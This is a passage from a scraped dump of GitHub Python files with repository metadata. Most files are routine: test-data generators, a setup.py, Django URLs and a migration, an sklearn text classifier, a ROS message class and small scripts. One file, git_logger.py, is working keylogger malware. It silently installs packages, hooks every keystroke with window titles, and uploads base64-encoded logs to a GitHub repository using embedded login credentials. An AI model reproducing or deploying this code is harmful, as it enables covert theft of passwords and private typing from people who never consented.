        setattr(ns, deriv, u.Quantity(getattr(ns, deriv)))
| [
"akgagnebin@csus.edu"
] | akgagnebin@csus.edu |
94e1bcfdf5adabec1171a6844867b600be9ef5e8 | c93b0f008d0977e0b9327ad8b930489f5cccae97 | /platfrom/testdata/RawQosBuffering.py | 3dbfb80b4f23f72c376766ece3d0dc34e83de492 | [] | no_license | ParkPan/ATCasePackage | 15caa664bd94c014ccbd1780353bfc5fcc0caa87 | edad6c1d5a343c740e251821fee0c29336f3d435 | refs/heads/master | 2020-06-16T02:44:06.323352 | 2016-12-01T03:46:44 | 2016-12-01T03:46:44 | 75,251,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,336 | py | import random
import sys
import os
import datavars
import dataprovider
sys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '..'))
from commonfunc import get_timestamp_by_time
class RawQosBuffering(dataprovider.Dataprovider):
    """Test-data provider for the raw_input_qos_buffering table.

    Writes a CSV-like text file of synthetic buffering QoS records next to
    this module and returns its path.
    """
    tablename = 'raw_input_qos_buffering'

    @classmethod
    def gettablename(cls):
        """Return the target table name for this provider."""
        return cls.tablename

    def makedata(self):
        """Generate RawQosBuffering.txt (4 random records per hour of a day)
        and return its absolute path."""
        # Columns: id,timestamp,peerid,url,vvid,type,1111,222,start_ts,end_ts
        data_format = '%s,%d,%s,%s,itsavvidstring,%s,1111,222,%d,%d\n'
        with open(os.path.abspath(os.path.dirname(__file__)) + '/RawQosBuffering.txt', 'w') as filedemanddata:
            for i in range(24):           # hour of day
                for j in [2, 6, 15, 26]:  # sampled "minute" values within the hour
                    # NOTE(review): the randint upper bounds assume
                    # datavars.id_range/peeid_range/url_range/type_range have at
                    # least 15/10/5/4 entries respectively — confirm in datavars.
                    # ('id' and 'type' shadow builtins; kept for compatibility.)
                    id = datavars.id_range[random.randint(0, 14)]
                    timestamp = get_timestamp_by_time(datavars.time_format % (i, j))
                    peerid = datavars.peeid_range[random.randint(0, 9)]
                    url = datavars.url_range[random.randint(0, 4)]
                    type = datavars.type_range[random.randint(0, 3)]
                    line = data_format % (
                        id, int(timestamp), peerid, url, type, int(timestamp) + random.randint(1, 100),
                        int(timestamp) + random.randint(100, 10000))
                    filedemanddata.write(line)
        return os.path.abspath(os.path.dirname(__file__)) + '/RawQosBuffering.txt'
| [
"panpan@cloutropy.com"
] | panpan@cloutropy.com |
ec88adb74b40ae3b44f04b1e117c8c881872eb99 | ba2d24fd6c5ce7d490ee57f224fd5435a1132093 | /setup.py | 7b0ac69b67ea99435a867d57e8b00a0787e5f3aa | [
"MIT"
] | permissive | FlowerOda/pytest-auto-parametrize | cb2aff37308bff571b980da88f222f8b88e4e36b | 9db33bb06de13c26f753bfd18e254ce10ae1256c | refs/heads/master | 2022-01-09T16:54:33.796383 | 2018-10-09T08:56:09 | 2018-10-09T08:56:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,591 | py | from setuptools import setup
from setuptools.command.test import test as TestCommand
import sys
__version__ = 'unknown'
# "import" __version__: execute only the assignment line from the module file
# so setup.py does not import (and thereby run) pytest_auto_parametrize itself.
for line in open('pytest_auto_parametrize.py'):
    if line.startswith('__version__'):
        exec(line)
        break
class PyTest(TestCommand):
    """Enable "python setup.py test".

    Stripped down from:
    http://doc.pytest.org/en/latest/goodpractices.html#manual-integration
    """

    def run_tests(self):
        # Import here: pytest is only guaranteed to be available once
        # tests_require has been resolved by setuptools.
        import pytest
        sys.exit(pytest.main([]))
setup(
    name='pytest-auto-parametrize',
    py_modules=['pytest_auto_parametrize'],
    version=__version__,
    author='Matthias Geier',
    author_email='Matthias.Geier@gmail.com',
    description='pytest plugin: avoid repeating arguments in parametrize',
    long_description=open('README.rst').read(),
    license='MIT',
    keywords='parametrized testing'.split(),
    url='https://github.com/mgeier/pytest-auto-parametrize',
    platforms='any',
    zip_safe=True,
    classifiers=[
        'Framework :: Pytest',
        'Development Status :: 3 - Alpha',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 3',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Testing',
    ],
    # Register the module under the 'pytest11' group so pytest auto-loads it
    # as a plugin when the package is installed.
    entry_points={
        'pytest11': ['pytest_auto_parametrize = pytest_auto_parametrize'],
    },
    tests_require=['pytest'],
    # Wire "python setup.py test" to the PyTest command defined above.
    cmdclass={'test': PyTest},
)
| [
"Matthias.Geier@gmail.com"
] | Matthias.Geier@gmail.com |
e47a19d0e98b34194eaab7401587fb61ac2f78e9 | e1ce0e26628f05c599097aca11a72d1873497333 | /random_tree/root/Root.py | 4916caa15b8d72e8905541511952c2b6c9b9355b | [] | no_license | lbmello/random-tree-generator | 05a1ecd6a594d23aea6d10d45b5e77f38bd5772f | aa6bd07b69a94244f31adf8c7b5e04bc6d741b30 | refs/heads/master | 2021-04-21T13:33:43.642712 | 2020-04-15T23:30:54 | 2020-04-15T23:30:54 | 249,784,345 | 1 | 0 | null | 2021-03-25T23:34:21 | 2020-03-24T18:17:39 | Python | UTF-8 | Python | false | false | 2,037 | py | """Modulo Root."""
from datetime import datetime
from random import randint
import hashlib
import os
from ..queue import FolderQueue
from ..data import YamlReader
class Root(object):
    """Manages the root directory in which the random tree is generated."""

    # Settings read from the YAML configuration file.
    path = YamlReader.path
    levels = YamlReader.levels
    size = YamlReader.size
    debug = YamlReader.debug

    def __init__(self):
        """Create the root directory; reusing it if it already exists."""
        self.path = Root.path
        try:
            os.mkdir(self.path)
            if Root.debug:
                print(f'Diretorio Raiz criado em {self.path}')
        except FileExistsError:
            if Root.debug:
                print('Diretorio Raiz ja criado!')

    @classmethod
    def add_existing_subdir_to_queue(cls):
        """If the queue is empty, walk the root directory and enqueue every subfolder."""
        if FolderQueue.is_empty():
            for dirpath, _, _ in os.walk(top=cls.path, topdown=True):
                FolderQueue.fila.push(dirpath)

    @classmethod
    def n_file_elements(cls):
        """Return a random integer between 1 and 3*{size}, used to generate files."""
        return randint(1, (3 * Root.size))

    @classmethod
    def n_folder_elements(cls):
        """Return a random integer between 1 and 2*{size}, used to generate folders."""
        return randint(1, (2 * Root.size))

    @classmethod
    def random_value(cls):
        """Return a random MD5 hex digest, derived from the current time
        repeated a random number (1 to 1000000) of times."""
        # strftime produces the same digits-only timestamp the old chain of
        # str().replace() calls built by hand (date, time and microseconds).
        stamp = datetime.now().strftime('%Y%m%d%H%M%S%f')
        # randint(1, ...): the previous randint(0, ...) contradicted the
        # documented range and could multiply the payload away to b''.
        payload = bytes(stamp * randint(1, 1000000), encoding='utf8')
        digest = hashlib.md5()
        digest.update(payload)
        return digest.hexdigest()
"lucasbmello96@gmail.com"
] | lucasbmello96@gmail.com |
064b469872ad95e7487c3cf649ca3cfa62170bdd | 6f05f7d5a67b6bb87956a22b988067ec772ba966 | /data/test/python/068d64a694460d83bc9a67db9e2e5f1e4e03d3c3urls.py | 068d64a694460d83bc9a67db9e2e5f1e4e03d3c3 | [
"MIT"
] | permissive | harshp8l/deep-learning-lang-detection | 93b6d24a38081597c610ecf9b1f3b92c7d669be5 | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | refs/heads/master | 2020-04-07T18:07:00.697994 | 2018-11-29T23:21:23 | 2018-11-29T23:21:23 | 158,597,498 | 0 | 0 | MIT | 2018-11-21T19:36:42 | 2018-11-21T19:36:41 | null | UTF-8 | Python | false | false | 717 | py | from django.conf.urls import url
from . import views
# Reusable regex fragments for named URL captures.
# NOTE(review): SITE_SLUG is defined but not used by any pattern below.
SITE_SLUG = "(?P<site_slug>[-_\w]+)"
IMAGE_SLUG = "(?P<image_slug>[-_\w]+)"
urlpatterns = [
    # Manage
    url(r'^$', views.manage_redirect, name='manage_redirect'),
    url(r'^manage/$', views.manage, name='manage'),
    url(r'^manage/archives$', views.archives, name='archives'),
    url(r'^manage/create/$', views.create, name='create'),
    url(r'^manage/create_js/$', views.create_js, name='create_js'),
    url(r'^manage/' + IMAGE_SLUG + '/trash$', views.trash, name='trash'),
    # View
    # NOTE(review): the '.' before "thumbnail"/"original" is an unescaped
    # regex dot, so it matches any character; a literal r'\.' was probably
    # intended -- confirm before tightening.
    url(r'^' + IMAGE_SLUG + '$', views.view),
    url(r'^' + IMAGE_SLUG + '.thumbnail', views.thumbnail),
    url(r'^' + IMAGE_SLUG + '.original', views.original),
]
| [
"aliostad+github@gmail.com"
] | aliostad+github@gmail.com |
d8c4f91ccf0ba1051ab621f1c22873cfde6e7ce0 | c4f8d4cd1d694ea7d75e180743b59642259f7db2 | /11/test11b.py | 497057e79b87b9b680d8e7f74abb4eaa0129e071 | [] | no_license | tuffing/adventofcode2018 | a5caf9ac1af0c94fac5840ed9db9efd6ef490e65 | ac216dcea5af9476dcd44cf529aa108c925fb27c | refs/heads/master | 2020-04-09T21:35:40.860886 | 2019-03-05T08:14:21 | 2019-03-05T08:14:21 | 160,606,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 447 | py | #!/usr/bin/python3
import unittest
#replace standard with day name
from sol11b import *
sys.path.append('../')
from scaffolding import common
class SolutionTest(unittest.TestCase):
    """Regression test for the day-11 part-b Advent of Code solution."""
    def test_full_solution(self):
        """Grid serial number 18 must yield the known answer '90,269,16'."""
        #remember to set the assert to the known examples and place the example test into testInput.txt!
        testObject = Solution()
        self.assertEqual('90,269,16', testObject.solution(18))
if __name__ == '__main__':
unittest.main() | [
"logan.orr@tuffing.co.nz"
] | logan.orr@tuffing.co.nz |
8a76756307d9f3887405c1ec0d882bb33b9bf16b | 2465f683816bd2a58c87a9aea22d1c35a23feb94 | /Part7_project_practice/Section22_text_classification_example/test_classification_example.py | d026235c19bed7e6d39982b3b17fa7160dfe82d8 | [] | no_license | lyx564/machine_learning | 73e1d0cc2aa27c211bfe080082e0bd321df8d630 | dc1214e36f913e783d92400bb81a8f15b74c943f | refs/heads/master | 2022-04-26T23:34:45.748634 | 2020-04-28T09:00:31 | 2020-04-28T09:00:31 | 210,793,487 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,486 | py | from sklearn.datasets import load_files
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report
from matplotlib import pyplot as plt
import warnings
warnings.filterwarnings('ignore')
# Load the data: the 18 newsgroup categories used for classification.
categories = ['alt.atheism', 'rec.sport.hockey', 'comp.graphics', 'sci.crypt', 'comp.os.ms-windows.misc', 'sci.electronics',
              'comp.sys.ibm.pc.hardware', 'sci.med', 'comp.sys.mac.hardware', 'sci.space', 'comp.windows.x', 'soc.religion.christian',
              'misc.forsale', 'talk.politics.mideast', 'rec.motorcycles', 'talk.politics.misc', 'rec.sport.baseball', 'talk.religion.misc']
# Load the training data
train_path = '20news-bydate-train'
dataset_train = load_files(container_path=train_path, categories=categories)
# Load the evaluation (test) data
test_path = '20news-bydate-test'
dataset_test = load_files(container_path=test_path, categories=categories)
# Data preparation and understanding
# # Raw word counts (bag of words) -- kept for reference
# count_vect = CountVectorizer(stop_words='english', decode_error='ignore')
# X_train_counts = count_vect.fit_transform(dataset_train.data)
# # Inspect the data dimensions
# print(X_train_counts.shape)
# Compute TF-IDF features
tf_transformer = TfidfVectorizer(stop_words='english', decode_error='ignore')
X_train_counts_tf = tf_transformer.fit_transform(dataset_train.data)
# # Inspect the data dimensions
# # print(X_train_counts_tf.shape)
# Baseline settings for evaluating the algorithms: 10-fold CV on accuracy
num_folds = 10
seed = 7
scoring = 'accuracy'
# #评估算法
# #生成算法模型
# models = {}
# models['LR'] = LogisticRegression()
# models['SVM'] = SVC()
# models['CART'] = DecisionTreeClassifier()
# models['MNB'] = MultinomialNB()
# models['KNN'] = KNeighborsClassifier()
#
# #比较算法
# results = []
# for key in models:
# kfold = KFold(n_splits=num_folds, random_state=seed)
# cv_results = cross_val_score(models[key], X_train_counts_tf, dataset_train.target, cv=kfold, scoring=scoring)
# results.append(cv_results)
# print('%s :%f (%f)' % (key, cv_results.mean(), cv_results.std()))
#
# #箱线图比较算法
# fig = plt.figure()
# fig.suptitle('Algorithm Comparision')
# ax = fig.add_subplot(111)
# plt.boxplot(results)
# ax.set_xticklabels(models.keys())
# plt.show()
#
# #算法调参
# param_grid = {}
# #调参LR
# param_grid['C'] = [0.1, 5, 13, 15]
# model = LogisticRegression()
# #调参MNB
# param_grid['alpha'] = [0.001, 0.01, 0.1, 1.5]
# model = MultinomialNB()
# kfold = KFold(n_splits=num_folds, random_state=seed)
# grid = GridSearchCV(estimator=model, param_grid=param_grid, scoring=scoring, cv=kfold)
# grid_result = grid.fit(X=X_train_counts_tf, y=dataset_train.target)
# print('最优:%s 使用 %s' % (grid_result.best_score_, grid_result.best_params_))
# #集成算法
# ensembles = {}
# ensembles['RF'] = RandomForestClassifier()
# ensembles['AB'] = AdaBoostClassifier()
# #比较集成算法
# results = []
# for key in ensembles:
# kfold = KFold(n_splits=num_folds, random_state=seed)
# cv_results = cross_val_score(ensembles[key], X_train_counts_tf, dataset_train.target, cv=kfold, scoring=scoring)
# results.append(cv_results)
# print('%s :%f (%f)' %(key, cv_results.mean(), cv_results.std()))
# #调参RF
# param_grid = {}
# param_grid['n_estimators'] = [10, 100, 150, 200]
# model = RandomForestClassifier()
# kfold = KFold(n_splits=num_folds, random_state=seed)
# grid = GridSearchCV(estimator=model, param_grid=param_grid, scoring=scoring, cv=kfold)
# grid_result = grid.fit(X=X_train_counts_tf, y=dataset_train.target)
# print('最优:%s 使用 %s' % (grid_result.best_score_, grid_result.best_params_))
# Build the final model. C=13 is the best value found by the (commented-out)
# logistic-regression grid search above; evaluate it on the held-out test set.
model = LogisticRegression(C=13)
model.fit(X_train_counts_tf, dataset_train.target)
X_test_counts = tf_transformer.transform(dataset_test.data)
predictions = model.predict(X_test_counts)
print(accuracy_score(dataset_test.target, predictions))
print(classification_report(dataset_test.target, predictions))
| [
"905389852@qq.com"
] | 905389852@qq.com |
66b57785e5149d4bf5dac17fb77176cb1ed8d035 | 101099a41b71294f2964b5158637551b68dd731d | /apps/siteinfo/migrations/0003_auto_20180425_1653.py | 89c01b67b084ec6018c5f97a67f9112683b0a794 | [] | no_license | edos21/ironmanedgar | ccb5c2c5cc4c3784f70c17fb496b44cc3642de12 | 98c8584d783043378a92296b892ea6be565f1a17 | refs/heads/master | 2023-07-26T19:59:31.909343 | 2019-06-04T15:16:31 | 2019-06-04T15:16:31 | 117,257,432 | 0 | 0 | null | 2021-09-08T01:17:31 | 2018-01-12T15:31:06 | CSS | UTF-8 | Python | false | false | 599 | py | # Generated by Django 2.0.1 on 2018-04-25 16:53
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: removes SiteInfo.sections, makes the
    twitter URL optional, and deletes the Section model."""
    dependencies = [
        ('siteinfo', '0002_auto_20180424_2031'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='siteinfo',
            name='sections',
        ),
        migrations.AlterField(
            model_name='siteinfo',
            name='twitter',
            field=models.URLField(blank=True, null=True, verbose_name='Twitter'),
        ),
        migrations.DeleteModel(
            name='Section',
        ),
    ]
| [
"edos21@gmail.com"
] | edos21@gmail.com |
d81651484faccd305d861d1627813a8342900501 | 282b31c5f6c2a04b4037a2be13602b19cbc4957e | /Python-labs/-9/Завдання 2 (Лаб 9).py | 1e577124314af69b5ed7ba127f7507c2bc122f78 | [] | no_license | Fabritsi/Python-labs | 72d52a428eb0d3c65d441f585a14ff49072acc4e | 20f0879953c0322a005e52aacd6a0dc00f5783f9 | refs/heads/main | 2023-03-07T08:12:24.337303 | 2021-02-21T10:14:07 | 2021-02-21T10:14:07 | 340,864,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,082 | py | InspectorDict = {"LastName": "", "Name": "", "Surname": "", "BornDate": 0, "TypeOfCrime": "", "Judgment": "" }
arrayOfInspectorDict = []

# Menu option number -> the record key that serch() compares against.
_SEARCH_KEYS = {
    1: "LastName",
    2: "Name",
    3: "Surname",
    4: "BornDate",
    5: "TypeOfCrime",
    6: "Judgment",
}

def serch(choose, criteria):
    """Print every stored record whose field selected by `choose`
    (1=last name .. 6=judgment) equals `criteria`.

    Unknown `choose` values print nothing, matching the behaviour of the
    original chain of six copy-pasted `if` branches this replaces.
    """
    key = _SEARCH_KEYS.get(choose)
    if key is None:
        return
    for record in arrayOfInspectorDict:
        if record[key] == criteria:
            print(record)
# Console menu loop: list, add, and search criminal records.
while True:
    print("\n")
    print("1. Вивести всю інформацію\n"
          "2. Ввести данні про злочинця\n"
          "3. Знайти злочинця\n"
          "4. Вийти\n")
    choose = int(input("Виберіть позицію:"))
    if choose == 1:
        # Option 1: dump every stored record.
        print(arrayOfInspectorDict)
    elif choose == 2:
        '''----Ввід даних про студента----'''
        # Option 2: read a new record from the console field by field.
        LastName = input("Введіть прізвище: ")
        Name = input("Введіть ім'я: ")
        Surname = input("По - батькові: ")
        BornDate = int(input("Рік народження: "))
        TypeCrime = input("Вид злочину: ")
        Judgment = input("Покарання: ")
        InspectorDict = {"LastName": LastName, "Name": Name, "Surname": Surname, "BornDate": BornDate, "TypeOfCrime": TypeCrime, "Judgment": Judgment}
        '''---Заповнення словника---'''
        # NOTE(review): the six assignments below are redundant (the dict
        # literal above already set these values), and "TypeCrime" is a typo
        # for "TypeOfCrime" -- it adds an extra key that serch() never reads.
        InspectorDict["LastName"] = LastName
        InspectorDict["Name"] = Name
        InspectorDict["Surname"] = Surname
        InspectorDict["BornDate"] = BornDate
        InspectorDict["TypeCrime"] = TypeCrime
        InspectorDict["Judgment"] = Judgment
        arrayOfInspectorDict.append(InspectorDict)
    elif choose == 3:
        # Option 3: pick a field, then print records matching the entered value.
        print("Знайти за:\n"
              "1.Прізвище\n"
              "2.Ім'я\n"
              "3.По - батькові\n"
              "4.Рік народження\n"
              "5.Вид злочину\n"
              "6.Покарання\n")
        choose2 = int(input("Виберіть позицію: "))
        if choose2 == 1:
            searchCriteria = input("Введіть прізвище злочинця: ")
            serch(1, searchCriteria)
        if choose2 == 2:
            searchCriteria = input("Введіть ім'я злочинця: ")
            serch(2, searchCriteria)
        if choose2 == 3:
            searchCriteria = input("Введіть по - батькові злочинця: ")
            serch(3, searchCriteria)
        if choose2 == 4:
            # Birth year is stored as an int, so convert before comparing.
            searchCriteria = int(input("Введіть рік народження злочинця: "))
            serch(4, searchCriteria)
        if choose2 == 5:
            searchCriteria = input("Введіть вид злочину злочинця: ")
            serch(5, searchCriteria)
        if choose2 == 6:
            searchCriteria = input("Введіть покарання для злочинця: ")
            serch(6, searchCriteria)
        print("\n")
    elif choose == 4:
        # Option 4: quit the program.
        break
    else:
        print("Ведіть коректне число\n")
| [
"noreply@github.com"
] | noreply@github.com |
ea30277fdda4769bc035c83cf910f8660e83b049 | 421f6ce9490876be113e5ed1ac173b1f6d70cb66 | /newYork/new_york_analysis/recursive_top_level/u_craigslist4237915975/craigslist4237915975scraper/craigslist4237915975scraper/items.py | 2ed8d4fb8cf4de54768e328577d307baa7ea0dfc | [] | no_license | EricSchles/humanTraffickingTalk | a1f4770c4380ea0424663baac79686be5b74733a | f399e6e6188601f34eab3fd8e7fc4a3ca30d9b14 | refs/heads/master | 2021-01-01T06:11:24.424134 | 2014-08-14T18:51:23 | 2014-08-14T18:51:23 | 14,879,906 | 17 | 5 | null | 2019-10-15T11:10:13 | 2013-12-03T01:15:11 | Python | UTF-8 | Python | false | false | 134 | py |
from scrapy.item import Item, Field
class craigslist4237915975Item(Item):
    """Scrapy item holding one scraped Craigslist posting."""
    title = Field()  # posting title
    link = Field()  # posting URL
    desc = Field()  # posting description
| [
"ericschles@gmail.com"
] | ericschles@gmail.com |
6656fbf5045a123bc70ed91d5be5aa25e2d69c09 | a0b8d47e87d33b5d7518d01278fb3556cfd941a6 | /devel/lib/python2.7/dist-packages/core_msgs/msg/_multiarray.py | 18a82c2e0e3c38e18b75b34654faccd0ea861698 | [] | no_license | dhhan120/capstone_2_Cgroup | 66c22ebb64e7d077a1729e39854897bcff2affc9 | 71382bc36a77c3bb783bc81e151f6c377de9205d | refs/heads/master | 2020-11-25T17:51:29.295490 | 2019-12-19T08:51:53 | 2019-12-19T08:51:53 | 228,779,538 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,223 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from core_msgs/multiarray.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import std_msgs.msg
class multiarray(genpy.Message):
_md5sum = "5f8105e16e9e9d9f45d4acb38630a37d"
_type = "core_msgs/multiarray"
_has_header = True #flag to mark the presence of a Header object
_full_text = """Header header
int8[] data
int32 cols
int32 rows
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
"""
__slots__ = ['header','data','cols','rows']
_slot_types = ['std_msgs/Header','int8[]','int32','int32']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
header,data,cols,rows
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(multiarray, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.header is None:
self.header = std_msgs.msg.Header()
if self.data is None:
self.data = []
if self.cols is None:
self.cols = 0
if self.rows is None:
self.rows = 0
else:
self.header = std_msgs.msg.Header()
self.data = []
self.cols = 0
self.rows = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.data)
buff.write(_struct_I.pack(length))
pattern = '<%sb'%length
buff.write(struct.pack(pattern, *self.data))
_x = self
buff.write(_get_struct_2i().pack(_x.cols, _x.rows))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sb'%length
start = end
end += struct.calcsize(pattern)
self.data = struct.unpack(pattern, str[start:end])
_x = self
start = end
end += 8
(_x.cols, _x.rows,) = _get_struct_2i().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.data)
buff.write(_struct_I.pack(length))
pattern = '<%sb'%length
buff.write(self.data.tostring())
_x = self
buff.write(_get_struct_2i().pack(_x.cols, _x.rows))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sb'%length
start = end
end += struct.calcsize(pattern)
self.data = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length)
_x = self
start = end
end += 8
(_x.cols, _x.rows,) = _get_struct_2i().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
  """Return the shared genpy Struct used to pack/unpack uint32 length prefixes."""
  global _struct_I
  return _struct_I
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
_struct_2i = None
def _get_struct_2i():
global _struct_2i
if _struct_2i is None:
_struct_2i = struct.Struct("<2i")
return _struct_2i
| [
"dhhan218@kaist.ac.kr"
] | dhhan218@kaist.ac.kr |
6e907d99daab017e865c8e55609d42b30531e01b | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4069/codes/1578_1331.py | f6e61de10d8ff19b5aa7a45b3dc1f2599615276b | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30 | py | x = 50//3
y = 50%3
print(x, y) | [
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
fd95b0d9e5f79057828a0ec3f2924b5321ac21c6 | c7c518ce251ad9b822d775e13e0c7edc86006454 | /git_logger.py | e6b3bdaa1a961d9d376c982c2d29629b25b2d8a8 | [
"MIT"
] | permissive | spirosavlonitis/chapter_7 | 791a5193ae086e24800ff733f3c3c27c0de67c2a | 1baeb90932350afa063e2de4bfec03b8899c63ff | refs/heads/master | 2020-04-14T08:50:08.348316 | 2019-01-07T02:16:01 | 2019-01-07T02:16:01 | 163,744,343 | 0 | 0 | null | 2019-01-05T04:47:36 | 2019-01-01T14:53:41 | Python | UTF-8 | Python | false | false | 2,434 | py | import json
import base64
import sys
import imp
import time
import subprocess
from random import randint
from threading import Thread
from queue import Queue
# dynamic import start
try:
from github3 import login
except Exception as e:
try:
subprocess.check_output("python -m pip install github3.py --user", shell=True)
from github3 import login
except Exception as e:
raise e
try:
import pyxhook
except Exception as e:
try:
subprocess.check_output("python -m pip install pyxhook --user", shell=True)
import pyxhook
except Exception as e:
raise e
# dynamic import end
isspace = lambda c: (c == 32 or c == 9)
class Logger():
def __init__(self):
"""Initialize object"""
self.id = "001" # id
self.config_json = None
self.str_buffer = ""
self.current_window = None
def connect_to_github(self):
"""Connect to github"""
self.gh = login(username="yourusername", password="yourpassword")
self.repo = self.gh.repository("yourusername", "yourrepository")
self.branch = self.repo.branch("master")
def store_log(self):
"""Push results to github"""
self.connect_to_github()
data_path = "data/%s/logger_%d.data" % (self.id, round(time.time()))
self.repo.create_file(data_path, "KeyStrokes", base64.b64encode(self.str_buffer.encode()))
self.str_buffer = ""
def KeyStroke(self, event):
"""Log keys"""
if self.current_window != event.WindowName:
self.current_window = event.WindowName
try:
self.str_buffer += "\n"+self.current_window+"\n"
except TypeError as e:
self.str_buffer += "\n"+self.current_window.decode()+"\n"
if "BackSpace" in event.Key and len(self.str_buffer):
self.str_buffer = self.str_buffer[:-1]
elif event.Ascii > 32 and event.Ascii < 128 or isspace(event.Ascii):
self.str_buffer += chr(event.Ascii)
elif "Return" in event.Key:
self.str_buffer += "\n"
if len(self.str_buffer) >= 512:
self.store_log()
return True
def main(argc, argv):
logger = Logger()
kl = pyxhook.HookManager()
kl.KeyDown = logger.KeyStroke
kl.HookKeyboard()
kl.start()
if __name__ == '__main__':
main(len(sys.argv), sys.argv)
| [
"spirosa84@hotmail.com"
] | spirosa84@hotmail.com |
0e8aa7538481abe5a5324a61bfe548e6eb342c62 | 7c89cad967988589a1969922adcb9d1d8ef8bbcb | /bpmappers/exceptions.py | 6fd9dbfc270ade0b6281e6570d53de457bd925f5 | [
"MIT"
